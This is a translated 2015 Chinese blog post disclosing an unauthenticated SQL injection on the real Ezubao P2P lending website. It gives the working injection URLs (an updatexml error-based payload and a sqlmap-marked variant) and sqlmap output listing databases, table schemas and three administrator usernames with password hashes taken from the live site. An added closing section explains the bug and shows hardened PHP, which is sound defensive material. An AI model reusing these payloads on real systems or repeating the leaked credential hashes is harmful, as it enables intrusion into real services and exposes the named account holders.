
P2P Security: E租宝 (Ezubao) Has a SQL Injection Vulnerability

2015-12-14 21:00

The official website of E租宝 (Ezubao), a subsidiary of 钰诚集团 (Yucheng Group), has a serious vulnerability: SQL injection is possible without being logged in.

[Screenshot: 1.png]

http://www.ezubo.com/home/borrow/doDel/idarr/updatexml(1,if(1=1,1,0x22),1)

Opening it shows the following:

[Screenshot: 2.png]

Then this URL (the `*` marks the injection point for sqlmap):

http://www.ezubo.com/home/borrow/doDel/idarr/updatexml(1,if(1=1*,1,0x22),1)

was thrown straight into the trusty sqlmap:

[Screenshot: 3.png]

available databases [4]:
[*] ezubao_php
[*] information_schema
[*] mysql
[*] performance_schema

Database: ezubao_php
Table: lzh_accounts
[5 columns]
+----------+---------------------+
| Column   | Type                |
+----------+---------------------+
| id       | int(10) unsigned    |
| is_final | tinyint(3) unsigned |
| level_id | varchar(12)         |
| name     | varchar(50)         |
| upd_time | timestamp           |
+----------+---------------------+

Database: ezubao_php
Table: lzh_ad
[8 columns]
+------------+------------------+
| Column     | Type             |
+------------+------------------+
| ad_type    | tinyint(4)       |
| add_time   | int(10)          |
| content    | varchar(5000)    |
| end_time   | int(10)          |
| id         | int(10) unsigned |
| start_time | int(10)          |
| title      | varchar(100)     |
| upd_time   | timestamp        |
+------------+------------------+

Database: ezubao_php
[166 tables]

select user_name,user_pwd from lzh_ausers [3]:
[*] admin, ab044bb3707a5bb729ce9500ba08b240
[*] jiangjun, 9f2cf1d42d5bf5efc754898ac5a2ecc0
[*] zongchen, ce83ac766dc561d2ae1a206fb0cd0b94

Database: ezubao_php
Table: lzh_ausers
[17 columns]
+----------------+------------------+
| Column         | Type             |
+----------------+------------------+
| area_id        | int(11)          |
| area_name      | varchar(10)      |
| id             | int(11)          |
| is_ban         | int(1)           |
| is_kf          | int(10) unsigned |
| last_log_ip    | varchar(30)      |
| last_log_time  | int(10)          |
| phone          | varchar(20)      |
| qq             | varchar(20)      |
| real_name      | varchar(20)      |
| u_company_flag | smallint(6)      |
| u_group_id     | smallint(6)      |
| upd_time       | timestamp        |
| user_name      | varchar(50)      |
| user_pass      | varchar(50)      |
| user_pwd       | varchar(50)      |
| user_word      | varchar(100)     |
+----------------+------------------+

Fix:

Update to a newer version.
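The report shows no server-side code and the fix is only "update". As an added illustration (written here, not Ezubao's or ThinkPHP's code), this is the shape of bug that a reflected updatexml() error implies: the raw `idarr` path segment spliced into a DELETE, beside a hardened handler that validates the list, binds every id and scopes the deletion to the logged-in owner, since the report notes the endpoint worked without login. The table lzh_borrow_info comes from the dump; the `user_id` column and the `$db` handle are assumptions.

```php
<?php
// Added example, not the site's code. Assumed: a PDO handle $db, and that
// lzh_borrow_info (a table named in the dump) has a user_id owner column.

// Vulnerable shape: the path segment is spliced into the SQL text, so any
// MySQL expression placed there is executed, and if database errors are
// displayed, the error message comes straight back to an anonymous visitor.
function doDelVulnerable(PDO $db, string $idarr): int
{
    return $db->exec("DELETE FROM lzh_borrow_info WHERE id IN ($idarr)");
}

// Hardened, step 1: accept only a comma-separated list of positive integers.
function parseIdList(string $idarr): array
{
    if (!preg_match('/^[1-9]\d*(,[1-9]\d*)*$/', $idarr)) {
        throw new InvalidArgumentException('idarr must be a comma-separated list of ids');
    }
    return array_map('intval', explode(',', $idarr));
}

// Hardened, step 2: bind each id as its own placeholder and restrict the
// DELETE to rows owned by the authenticated user, so the endpoint is both
// injection-safe and authorised rather than open to anonymous callers.
function doDelHardened(PDO $db, ?int $ownerId, string $idarr): int
{
    if ($ownerId === null) {
        throw new RuntimeException('login required');
    }
    $ids = parseIdList($idarr);
    $marks = implode(',', array_fill(0, count($ids), '?'));
    $stmt = $db->prepare(
        "DELETE FROM lzh_borrow_info WHERE user_id = ? AND id IN ($marks)"
    );
    $stmt->execute(array_merge([$ownerId], $ids));
    return $stmt->rowCount();
}

// Connection options (assumed DSN/credentials): disable emulated prepares so
// MySQL itself receives the bound values, and surface driver errors as
// exceptions that the application logs instead of printing to the client.
// $db = new PDO($dsn, $user, $pass, [
//     PDO::ATTR_EMULATE_PREPARES => false,
//     PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
// ]);
```

In production also keep `display_errors` off, because the error-based technique in the report only works when the server echoes MySQL's error text to the browser.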

Source: www.2cto.com/Article/201512/453497.html
